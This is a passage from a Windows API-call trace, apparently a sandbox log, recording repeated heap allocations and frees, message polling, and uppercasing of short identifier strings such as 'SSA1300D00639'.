hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0208.152] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.153] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0208.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab50 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.154] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0208.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0208.155] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0208.155] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.155] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0208.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.156] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0208.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0208.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.157] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0208.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.157] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0208.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0208.158] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0208.158] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.159] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.159] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0208.160] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0208.160] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0208.160] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0208.161] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0208.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0208.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0208.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0208.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0208.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0208.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0208.163] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: 